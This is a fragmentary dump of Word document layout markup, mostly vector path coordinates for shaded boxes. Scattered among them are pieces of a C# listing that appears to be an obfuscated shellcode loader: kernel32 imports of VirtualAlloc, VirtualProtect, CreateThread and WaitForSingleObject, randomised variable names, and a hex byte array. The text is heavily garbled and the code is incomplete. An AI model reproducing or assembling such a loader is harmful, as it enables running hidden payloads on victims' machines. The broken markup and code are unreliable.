,1510,14375,1510,14368,1510,14360,1510,14352,1510,14345,1510,14337,1510,14328,1510,14320,1510,14311,1510,14303,1510,14294,1510,14284,1510,14275,1510,14265,1510,14256,1510,14246,1510,14235,1510,14225,1510,14214,1510,14203,1510,14192,1510,14181,1510,14169,1510,14158,1510,14146,1510,14133,1510,14121,1510,14108,1510,14095,1510,14082,1510,14068,1510,14055,1510,14041,1510,14027,1510,14012,1510,13997,1510,13982,1510,13967,1510,13952,1510,13936e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:696.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,13930" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:13930;width:30;height:630" coordorigin="1490,13930" coordsize="30,630" path="m1517,13936l1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13936,1517,13937,1517,13937,1517,13937,1517,13937,1517,13937,1517,13938,1517,13938,1517,13938,1517,13939,1517,13939,1517,13939,1517,13940,1517,13941,1517,13941,1517,13942,1517,13943,1517,13943,1517,13944,1517,13945,1517,13946,1517,13947,1517,13948,1517,13949,1517,13951,1517,13952,1517,13953,1517,13955,1517,13957,1517,13958,1517,13960,1517,13962,1517,13964,1517,13966,1517,13968,1517,13970,1517,13972,1517,13975,1517,13977,1517,13980,1517,13983,1517,13986,1517,13989,1517,13992,1517,13995,1517,13998,1517,14002,1517,14005,1517,14009,1517,14013,1517,14017,1517,14021,1517,14025,1517,14030,1517,14034,1517,14039,1517,14044,1517,14049,1517,14054,1517,14059,1517,14064,1517,14070,1517,14076,1517,14082,1517,14088,1517,14094,1517,14100,1517,14107,1517,14114,1517,14120,1517,14128,1517,14135,1517,14142,1517,14150,1517,14158,1517,14166,1517,14174,1517,14182,1517,14191,1517,14200,1517,14209,1517,14218,1517,14227,1517,14237,1517,14247,1517,14257,1517,14267,1517,14277,1517,14288,1517,14299,1517,14310,1517,14321,1517,14333,1517,14345,1517,14357,1517,14369,1517,14382,1517,14394,1517,14407,1517,14420,1517,14434,1517,14448,1517,14462,1517,14476,1517,14490,1517,14505,1517,14520,1517,14535,1517,14551,1517,14566e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:727.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14550" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:14550;width:8990;height:650" coordorigin="1490,14550" coordsize="8990,650" path="m1510,14566l1510,14566,1510,14566,1510,14566,1510,14566,1510,14566,1510,14566,1511,14566,1512,14566,1512,14566,1514,14566,1515,14566,1517,14566,1519,14566,1521,14566,1524,14566,1528,14566,1532,14566,1536,14566,1541,14566,1546,14566,1552,14566,1559,14566,1566,14566,1575,14566,1583,14566,1593,14566,1603,14566,1615,14566,1627,14566,1640,14566,1654,14566,1668,14566,1684,14566,1701,14566,1719,14566,1738,14566,1758,14566,1780,14566,1802,14566,1826,14566,1851,14566,1877,14566,1904,14566,1933,14566,1963,14566,1995,14566,2028,14566,2063,14566,2099,14566,2136,14566,2175,14566,2216,14566,2259,14566,2303,14566,2348,14566,2396,14566,2445,14566,2496,14566,2549,14566,2604,14566,2660,14566,2719,14566,2779,14566,2841,14566,2906,14566,2972,14566,3041,14566,3112,14566,3184,14566,3259,14566,3336,14566,3416,14566,3498,14566,3582,14566,3668,14566,3757,14566,3848,14566,3941,14566,4037,14566,4136,14566,4236,14566,4340,14566,4446,14566,4555,14566,4666,14566,4780,14566,4897,14566,5017,14566,5139,14566,5264,14566,5392,14566,5523,14566,5657,14566,5793,14566,5933,14566,6076,14566,6222,14566,6370,14566,6522,14566,6677,14566,6835,14566,6997,14566,7161,14566,7329,14566,7500,14566,7675,14566,7853,14566,8034,14566,8219,14566,8407,14566,8598,14566,8793,14566,8992,14566,9194,14566,9400,14566,9609,14566,9823,14566,10039,14566,10260,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14566,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14567,10484,14568,10484,14568,10484,14568,10484,14569,10484,14569,10484,14569,10484,14570,10484,14570,10484,14571,10484,14572,10484,14572,10484,14573,10484,14574,10484,14575,10484,14576,10484,14577,10484,14578,10484,14579,10484,14580,10484,14581,10484,14583,10484,14584,10484,14586,10484,14587,10484,14589,10484,14591,10484,14593,10484,14595,10484,14597,10484,14599,10484,14601,10484,14604,10484,14606,10484,14609,10484,14611,10484,14614,10484,14617,10484,14620,10484,14623,10484,14627,10484,14630,10484,14634,10484,14637,10484,14641,10484,14645,10484,14649,10484,14653,10484,14658,10484,14662,10484,14667,10484,14671,10484,14676,10484,14682,10484,14687,10484,14692,10484,14698,10484,14703,10484,14709,10484,14715,10484,14722,10484,14728,10484,14734,10484,14741,10484,14748,10484,14755,10484,14762,10484,14770,10484,14777,10484,14785,10484,14793,10484,14802,10484,14810,10484,14819,10484,14827,10484,14836,10484,14845,10484,14855,10484,14865,10484,14874,10484,14884,10484,14895,10484,14905,10484,14916,10484,14927,10484,14938,10484,14949,10484,14961,10484,14973,10484,14985,10484,14997,10484,15010,10484,15022,10484,15035,10484,15049,10484,15062,10484,15076,10484,15090,10484,15104,10484,15119,10484,15134,10484,15149,10484,15164,10484,15180,10484,15196,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10483,15212,10482,15212,10482,15212,10480,15212,10479,15212,10477,15212,10475,15212,10473,15212,10470,15212,10466,15212,10462,15212,10458,15212,10453,15212,10448,15212,10442,15212,10435,15212,10428,15212,10419,15212,10411,15212,10401,15212,10391,15212,10379,15212,10367,15212,10354,15212,10340,15212,10326,15212,10310,15212,10293,15212,10275,15212,10256,15212,10236,15212,10215,15212,10192,15212,10168,15212,10143,15212,10117,15212,10090,15212,10061,15212,10031,15212,9999,15212,9966,15212,9931,15212,9895,15212,9858,15212,9819,15212,9778,15212,9735,15212,9691,15212,9646,15212,9598,15212,9549,15212,9498,15212,9445,15212,9391,15212,9334,15212,9275,15212,9215,15212,9153,15212,9088,15212,9022,15212,8953,15212,8883,15212,8810,15212,8735,15212,8658,15212,8578,15212,8497,15212,8413,15212,8326,15212,8238,15212,8146,15212,8053,15212,7957,15212,7859,15212,7758,15212,7654,15212,7548,15212,7439,15212,7328,15212,7214,15212,7097,15212,6977,15212,6855,15212,6730,15212,6602,15212,6471,15212,6337,15212,6201,15212,6061,15212,5918,15212,5773,15212,5624,15212,5472,15212,5317,15212,5159,15212,4997,15212,4833,15212,4665,15212,4494,15212,4319,15212,4141,15212,3960,15212,3776,15212,3587,15212,3396,15212,3201,15212,3002,15212,2800,15212,2594,15212,2385,15212,2172,15212,1955,15212,1734,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15211,1510,15210,1510,15210,1510,15210,1510,15209,1510,15209,1510,15209,1510,15208,1510,15208,1510,15207,1510,15206,1510,15206,1510,15205,1510,15204,1510,15203,1510,15202,1510,15201,1510,15200,1510,15199,1510,15198,1510,15197,1510,15195,1510,15194,1510,15192,1510,15191,1510,15189,1510,15187,1510,15185,1510,15183,1510,15181,1510,15179,1510,15177,1510,15174,1510,15172,1510,15169,1510,15167,1510,15164,1510,15161,1510,15158,1510,15155,1510,15151,1510,15148,1510,15144,1510,15141,1510,15137,1510,15133,1510,15129,1510,15125,1510,15120,1510,15116,1510,15111,1510,15106,1510,15102,1510,15096,1510,15091,1510,15086,1510,15080,1510,15075,1510,15069,1510,15063,1510,15056,1510,15050,1510,15044,1510,15037,1510,15030,1510,15023,1510,15016,1510,15008,1510,15001,1510,14993,1510,14985,1510,14976,1510,14968,1510,14959,1510,14951,1510,14942,1510,14932,1510,14923,1510,14913,1510,14904,1510,14894,1510,14883,1510,14873,1510,14862,1510,14851,1510,14840,1510,14829,1510,14817,1510,14805,1510,14793,1510,14781,1510,14768,1510,14756,1510,14743,1510,14729,1510,14716,1510,14702,1510,14688,1510,14674,1510,14659,1510,14644,1510,14629,1510,14614,1510,14598,1510,14582,1510,14566e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:727.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14550" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:14550;width:30;height:650" coordorigin="1490,14550" coordsize="30,650" path="m1517,14566l1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14566,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14567,1517,14568,1517,14568,1517,14568,1517,14569,1517,14569,1517,14569,1517,14570,1517,14570,1517,14571,1517,14572,1517,14572,1517,14573,1517,14574,1517,14575,1517,14576,1517,14577,1517,14578,1517,14579,1517,14580,1517,14581,1517,14583,1517,14584,1517,14586,1517,14587,1517,14589,1517,14591,1517,14593,1517,14595,1517,14597,1517,14599,1517,14601,1517,14604,1517,14606,1517,14609,1517,14611,1517,14614,1517,14617,1517,14620,1517,14623,1517,14627,1517,14630,1517,14634,1517,14637,1517,14641,1517,14645,1517,14649,1517,14653,1517,14658,1517,14662,1517,14667,1517,14671,1517,14676,1517,14682,1517,14687,1517,14692,1517,14698,1517,14703,1517,14709,1517,14715,1517,14722,1517,14728,1517,14734,1517,14741,1517,14748,1517,14755,1517,14762,1517,14770,1517,14777,1517,14785,1517,14793,1517,14802,1517,14810,1517,14819,1517,14827,1517,14836,1517,14845,1517,14855,1517,14865,1517,14874,1517,14884,1517,14895,1517,14905,1517,14916,1517,14927,1517,14938,1517,14949,1517,14961,1517,14973,1517,14985,1517,14997,1517,15010,1517,15022,1517,15035,1517,15049,1517,15062,1517,15076,1517,15090,1517,15104,1517,15119,1517,15134,1517,15149,1517,15164,1517,15180,1517,15196,1517,15212e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:759.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15190" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:15190;width:8990;height:650" coordorigin="1490,15190" coordsize="8990,650" path="m1510,15212l1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1510,15212,1511,15212,1512,15212,1512,15212,1514,15212,1515,15212,1517,15212,1519,15212,1521,15212,1524,15212,1528,15212,1532,15212,1536,15212,1541,15212,1546,15212,1552,15212,1559,15212,1566,15212,1575,15212,1583,15212,1593,15212,1603,15212,1615,15212,1627,15212,1640,15212,1654,15212,1668,15212,1684,15212,1701,15212,1719,15212,1738,15212,1758,15212,1780,15212,1802,15212,1826,15212,1851,15212,1877,15212,1904,15212,1933,15212,1963,15212,1995,15212,2028,15212,2063,15212,2099,15212,2136,15212,2175,15212,2216,15212,2259,15212,2303,15212,2348,15212,2396,15212,2445,15212,2496,15212,2549,15212,2604,15212,2660,15212,2719,15212,2779,15212,2841,15212,2906,15212,2972,15212,3041,15212,3112,15212,3184,15212,3259,15212,3336,15212,3416,15212,3498,15212,3582,15212,3668,15212,3757,15212,3848,15212,3941,15212,4037,15212,4136,15212,4236,15212,4340,15212,4446,15212,4555,15212,4666,15212,4780,15212,4897,15212,5017,15212,5139,15212,5264,15212,5392,15212,5523,15212,5657,15212,5793,15212,5933,15212,6076,15212,6222,15212,6370,15212,6522,15212,6677,15212,6835,15212,6997,15212,7161,15212,7329,15212,7500,15212,7675,15212,7853,15212,8034,15212,8219,15212,8407,15212,8598,15212,8793,15212,8992,15212,9194,15212,9400,15212,9609,15212,9823,15212,10039,15212,10260,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15212,10484,15213,10484,15213,10484,15213,10484,15213,10484,15214,10484,15214,10484,15215,10484,15215,10484,15216,10484,15216,10484,15217,10484,15218,10484,15218,10484,15219,10484,15220,10484,15221,10484,15222,10484,15223,10484,15224,10484,15225,10484,15226,10484,15228,10484,15229,10484,15231,10484,15232,10484,15234,10484,15236,10484,15237,10484,15239,10484,15241,10484,15244,10484,15246,10484,15248,10484,15250,10484,15253,10484,15256,10484,15258,10484,15261,10484,15264,10484,15267,10484,15271,10484,15274,10484,15277,10484,15281,10484,15285,10484,15288,10484,15292,10484,15297,10484,15301,10484,15305,10484,15310,10484,15314,10484,15319,10484,15324,10484,15329,10484,15335,10484,15340,10484,15346,10484,15351,10484,15357,10484,15363,10484,15369,10484,15376,10484,15382,10484,15389,10484,15396,10484,15403,10484,15410,10484,15418,10484,15426,10484,15433,10484,15441,10484,15450,10484,15458,10484,15467,10484,15475,10484,15484,10484,15494,10484,15503,10484,15513,10484,15522,10484,15532,10484,15543,10484,15553,10484,15564,10484,15575,10484,15586,10484,15597,10484,15609,10484,15620,10484,15632,10484,15645,10484,15657,10484,15670,10484,15683,10484,15696,10484,15710,10484,15723,10484,15737,10484,15751,10484,15766,10484,15781,10484,15795,10484,15811,10484,15826,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10484,15842,10483,15842,10482,15842,10482,15842,10480,15842,10479,15842,10477,15842,10475,15842,10473,15842,10470,15842,10466,15842,10462,15842,10458,15842,10453,15842,10448,15842,10442,15842,10435,15842,10428,15842,10419,15842,10411,15842,10401,15842,10391,15842,10379,15842,10367,15842,10354,15842,10340,15842,10326,15842,10310,15842,10293,15842,10275,15842,10256,15842,10236,15842,10215,15842,10192,15842,10168,15842,10143,15842,10117,15842,10090,15842,10061,15842,10031,15842,9999,15842,9966,15842,9931,15842,9895,15842,9858,15842,9819,15842,9778,15842,9735,15842,9691,15842,9646,15842,9598,15842,9549,15842,9498,15842,9445,15842,9391,15842,9334,15842,9275,15842,9215,15842,9153,15842,9088,15842,9022,15842,8953,15842,8883,15842,8810,15842,8735,15842,8658,15842,8578,15842,8497,15842,8413,15842,8326,15842,8238,15842,8146,15842,8053,15842,7957,15842,7859,15842,7758,15842,7654,15842,7548,15842,7439,15842,7328,15842,7214,15842,7097,15842,6977,15842,6855,15842,6730,15842,6602,15842,6471,15842,6337,15842,6201,15842,6061,15842,5918,15842,5773,15842,5624,15842,5472,15842,5317,15842,5159,15842,4997,15842,4833,15842,4665,15842,4494,15842,4319,15842,4141,15842,3960,15842,3776,15842,3587,15842,3396,15842,3201,15842,3002,15842,2800,15842,2594,15842,2385,15842,2172,15842,1955,15842,1734,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15842,1510,15841,1510,15841,1510,15841,1510,15841,1510,15841,1510,15840,1510,15840,1510,15840,1510,15839,1510,15839,1510,15839,1510,15838,1510,15837,1510,15837,1510,15836,1510,15835,1510,15835,1510,15834,1510,15833,1510,15832,1510,15831,1510,15830,1510,15829,1510,15827,1510,15826,1510,15825,1510,15823,1510,15821,1510,15820,1510,15818,1510,15816,1510,15814,1510,15812,1510,15810,1510,15808,1510,15806,1510,15803,1510,15801,1510,15798,1510,15795,1510,15792,1510,15789,1510,15786,1510,15783,1510,15780,1510,15776,1510,15773,1510,15769,1510,15765,1510,15761,1510,15757,1510,15753,1510,15748,1510,15744,1510,15739,1510,15734,1510,15729,1510,15724,1510,15719,1510,15714,1510,15708,1510,15702,1510,15696,1510,15690,1510,15684,1510,15678,1510,15671,1510,15664,1510,15658,1510,15650,1510,15643,1510,15636,1510,15628,1510,15620,1510,15612,1510,15604,1510,15596,1510,15587,1510,15578,1510,15569,1510,15560,1510,15551,1510,15541,1510,15531,1510,15521,1510,15511,1510,15501,1510,15490,1510,15479,1510,15468,1510,15457,1510,15445,1510,15433,1510,15421,1510,15409,1510,15396,1510,15384,1510,15371,1510,15358,1510,15344,1510,15330,1510,15316,1510,15302,1510,15288,1510,15273,1510,15258,1510,15243,1510,15227,1510,15212e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:759.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15190" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:15190;width:30;height:650" coordorigin="1490,15190" coordsize="30,650" path="m1517,15212l1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15212,1517,15213,1517,15213,1517,15213,1517,15213,1517,15214,1517,15214,1517,15215,1517,15215,1517,15216,1517,15216,1517,15217,1517,15218,1517,15218,1517,15219,1517,15220,1517,15221,1517,15222,1517,15223,1517,15224,1517,15225,1517,15226,1517,15228,1517,15229,1517,15231,1517,15232,1517,15234,1517,15236,1517,15237,1517,15239,1517,15241,1517,15244,1517,15246,1517,15248,1517,15250,1517,15253,1517,15256,1517,15258,1517,15261,1517,15264,1517,15267,1517,15271,1517,15274,1517,15277,1517,15281,1517,15285,1517,15288,1517,15292,1517,15297,1517,15301,1517,15305,1517,15310,1517,15314,1517,15319,1517,15324,1517,15329,1517,15335,1517,15340,1517,15346,1517,15351,1517,15357,1517,15363,1517,15369,1517,15376,1517,15382,1517,15389,1517,15396,1517,15403,1517,15410,1517,15418,1517,15426,1517,15433,1517,15441,1517,15450,1517,15458,1517,15467,1517,15475,1517,15484,1517,15494,1517,15503,1517,15513,1517,15522,1517,15532,1517,15543,1517,15553,1517,15564,1517,15575,1517,15586,1517,15597,1517,15609,1517,15620,1517,15632,1517,15645,1517,15657,1517,15670,1517,15683,1517,15696,1517,15710,1517,15723,1517,15737,1517,15751,1517,15766,1517,15781,1517,15795,1517,15811,1517,15826,1517,15842e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:238.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,4770" coordsize="130,250">
        <v:shape style="position:absolute;left:4210;top:4770;width:130;height:250" coordorigin="4210,4770" coordsize="130,250" path="m4226,4781l4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4226,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4227,4781,4228,4781,4228,4781,4228,4781,4228,4781,4228,4781,4228,4781,4229,4781,4229,4781,4229,4781,4229,4781,4230,4781,4230,4781,4230,4781,4231,4781,4231,4781,4231,4781,4232,4781,4232,4781,4233,4781,4233,4781,4234,4781,4234,4781,4235,4781,4235,4781,4236,4781,4236,4781,4237,4781,4237,4781,4238,4781,4239,4781,4239,4781,4240,4781,4241,4781,4242,4781,4242,4781,4243,4781,4244,4781,4245,4781,4246,4781,4247,4781,4248,4781,4249,4781,4250,4781,4251,4781,4252,4781,4253,4781,4254,4781,4255,4781,4256,4781,4257,4781,4259,4781,4260,4781,4261,4781,4263,4781,4264,4781,4265,4781,4267,4781,4268,4781,4270,4781,4271,4781,4273,4781,4275,4781,4276,4781,4278,4781,4280,4781,4282,4781,4283,4781,4285,4781,4287,4781,4289,4781,4291,4781,4293,4781,4295,4781,4297,4781,4300,4781,4302,4781,4304,4781,4306,4781,4309,4781,4311,4781,4313,4781,4316,4781,4318,4781,4321,4781,4324,4781,4326,4781,4329,4781,4332,4781,4334,4781,4337,4781,4340,4781,4343,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4781,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4782,4346,4783,4346,4783,4346,4783,4346,4783,4346,4783,4346,4784,4346,4784,4346,4784,4346,4785,4346,4785,4346,4785,4346,4786,4346,4786,4346,4787,4346,4787,4346,4788,4346,4788,4346,4789,4346,4790,4346,4790,4346,4791,4346,4792,4346,4793,4346,4793,4346,4794,4346,4795,4346,4796,4346,4797,4346,4798,4346,4799,4346,4800,4346,4801,4346,4803,4346,4804,4346,4805,4346,4807,4346,4808,4346,4809,4346,4811,4346,4812,4346,4814,4346,4816,4346,4817,4346,4819,4346,4821,4346,4823,4346,4825,4346,4827,4346,4829,4346,4831,4346,4833,4346,4836,4346,4838,4346,4840,4346,4843,4346,4845,4346,4848,4346,4851,4346,4853,4346,4856,4346,4859,4346,4862,4346,4865,4346,4868,4346,4871,4346,4874,4346,4878,4346,4881,4346,4885,4346,4888,4346,4892,4346,4895,4346,4899,4346,4903,4346,4907,4346,4911,4346,4915,4346,4920,4346,4924,4346,4928,4346,4933,4346,4937,4346,4942,4346,4947,4346,4952,4346,4957,4346,4962,4346,4967,4346,4972,4346,4977,4346,4983,4346,4988,4346,4994,4346,5000,4346,5006,4346,5012,4346,5018,4346,5024,4346,5030,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4346,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4345,5037,4344,5037,4344,5037,4344,5037,4344,5037,4344,5037,4343,5037,4343,5037,4343,5037,4343,5037,4342,5037,4342,5037,4342,5037,4341,5037,4341,5037,4341,5037,4340,5037,4340,5037,4339,5037,4339,5037,4338,5037,4338,5037,4337,5037,4337,5037,4336,5037,4336,5037,4335,5037,4334,5037,4334,5037,4333,5037,4332,5037,4332,5037,4331,5037,4330,5037,4329,5037,4328,5037,4328,5037,4327,5037,4326,5037,4325,5037,4324,5037,4323,5037,4322,5037,4321,5037,4320,5037,4318,5037,4317,5037,4316,5037,4315,5037,4314,5037,4312,5037,4311,5037,4310,5037,4308,5037,4307,5037,4305,5037,4304,5037,4302,5037,4301,5037,4299,5037,4298,5037,4296,5037,4294,5037,4292,5037,4291,5037,4289,5037,4287,5037,4285,5037,4283,5037,4281,5037,4279,5037,4277,5037,4275,5037,4273,5037,4271,5037,4268,5037,4266,5037,4264,5037,4261,5037,4259,5037,4256,5037,4254,5037,4251,5037,4249,5037,4246,5037,4243,5037,4241,5037,4238,5037,4235,5037,4232,5037,4229,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5037,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5036,4226,5035,4226,5035,4226,5035,4226,5035,4226,5035,4226,5034,4226,5034,4226,5034,4226,5034,4226,5033,4226,5033,4226,5032,4226,5032,4226,5032,4226,5031,4226,5031,4226,5030,4226,5029,4226,5029,4226,5028,4226,5028,4226,5027,4226,5026,4226,5025,4226,5024,4226,5024,4226,5023,4226,5022,4226,5021,4226,5020,4226,5019,4226,5018,4226,5016,4226,5015,4226,5014,4226,5013,4226,5011,4226,5010,4226,5008,4226,5007,4226,5005,4226,5004,4226,5002,4226,5000,4226,4999,4226,4997,4226,4995,4226,4993,4226,4991,4226,4989,4226,4987,4226,4985,4226,4982,4226,4980,4226,4978,4226,4975,4226,4973,4226,4970,4226,4967,4226,4965,4226,4962,4226,4959,4226,4956,4226,4953,4226,4950,4226,4947,4226,4944,4226,4940,4226,4937,4226,4933,4226,4930,4226,4926,4226,4922,4226,4919,4226,4915,4226,4911,4226,4907,4226,4903,4226,4898,4226,4894,4226,4890,4226,4885,4226,4881,4226,4876,4226,4871,4226,4866,4226,4861,4226,4856,4226,4851,4226,4846,4226,4840,4226,4835,4226,4829,4226,4824,4226,4818,4226,4812,4226,4806,4226,4800,4226,4794,4226,4788,4226,478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3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VirtualAlloc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rCfMkmxRSAakg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,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qjRsrljIMB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peXiTuE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AkpADfOOAVBZ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07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0076a9"/>
          <w:spacing w:val="5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bool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VirtualProtect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IntPt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DStOGXQMMkP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CzzIpcuQppQSTBJ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JCFImGhkRqtwANx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out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exgVp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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sg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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92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CreateThread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UInt3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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2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eisuQbXKYbAvA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WQATOZaFz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AEGJQOn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,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SYcfyeeSgPl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t32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ZSheqBwKtDf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ref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SZtdSB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DllImport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"kernel32"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static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extern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WaitForSingleObje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ct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KqJNFlHpsKOV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EYBOArlCLAM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0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public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yrDaTlg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{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byte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QWKpWKhcs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{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0xe8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0xcc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52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,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0xb7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0x66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0xe3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0xd6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x8b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0x1c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x01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0x4b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0x33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x00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0xa8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0x54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xe4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10.883pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16217">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16217" coordorigin="10402,0" coordsize="0,16217" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,7,10402,9,10402,12,10402,16,10402,21,10402,26,10402,32,10402,39,10402,47,10402,56,10402,66,10402,76,10402,89,10402,102,10402,117,10402,133,10402,150,10402,169,10402,189,10402,211,10402,234,10402,259,10402,286,10402,315,10402,345,10402,378,10402,412,10402,449,10402,487,10402,528,10402,570,10402,615,10402,663,10402,713,10402,765,10402,819,10402,876,10402,936,10402,999,10402,1064,10402,1132,10402,1202,10402,1276,10402,1353,10402,1432,10402,1515,10402,1601,10402,1690,10402,1782,10402,1877,10402,1976,10402,2078,10402,2184,10402,2293,10402,2406,10402,2522,10402,2642,10402,2766,10402,2894,10402,3026,10402,3161,10402,3300,10402,3444,10402,3592,10402,3743,10402,3899,10402,4060,10402,4224,10402,4393,10402,4567,10402,4744,10402,4927,10402,5114,10402,5306,10402,5502,10402,5704,10402,5910,10402,6121,10402,6337,10402,6558,10402,6784,10402,7015,10402,7252,10402,7493,10402,7740,10402,7993,10402,8251,10402,8514,10402,8783,10402,9057,10402,9337,10402,9623,10402,9915,10402,10212,10402,10516,10402,10825,10402,11140,10402,11462,10402,11789,10402,12123,10402,12463,10402,12809,10402,13161,10402,13520,10402,13886,10402,14258,10402,14636,10402,15021,10402,15413,10402,15812,10402,16217e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:18.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,370" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:370;width:8990;height:630" coordorigin="1490,370" coordsize="8990,630" path="m1510,384l1510,384,1510,384,1510,384,1510,384,1510,384,1510,384,1511,384,1512,384,1512,384,1514,384,1515,384,1517,384,1519,384,1521,384,1524,384,1528,384,1532,384,1536,384,1541,384,1546,384,1552,384,1559,384,1566,384,1575,384,1583,384,1593,384,1603,384,1615,384,1627,384,1640,384,1654,384,1668,384,1684,384,1701,384,1719,384,1738,384,1758,384,1780,384,1802,384,1826,384,1851,384,1877,384,1904,384,1933,384,1963,384,1995,384,2028,384,2063,384,2099,384,2136,384,2175,384,2216,384,2259,384,2303,384,2348,384,2396,384,2445,384,2496,384,2549,384,2604,384,2660,384,2719,384,2779,384,2841,384,2906,384,2972,384,3041,384,3112,384,3184,384,3259,384,3336,384,3416,384,3498,384,3582,384,3668,384,3757,384,3848,384,3941,384,4037,384,4136,384,4236,384,4340,384,4446,384,4555,384,4666,384,4780,384,4897,384,5017,384,5139,384,5264,384,5392,384,5523,384,5657,384,5793,384,5933,384,6076,384,6222,384,6370,384,6522,384,6677,384,6835,384,6997,384,7161,384,7329,384,7500,384,7675,384,7853,384,8034,384,8219,384,8407,384,8598,384,8793,384,8992,384,9194,384,9400,384,9609,384,9823,384,10039,384,10260,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,384,10484,385,10484,385,10484,385,10484,385,10484,385,10484,385,10484,386,10484,386,10484,386,10484,387,10484,387,10484,388,10484,388,10484,389,10484,389,10484,390,10484,391,10484,3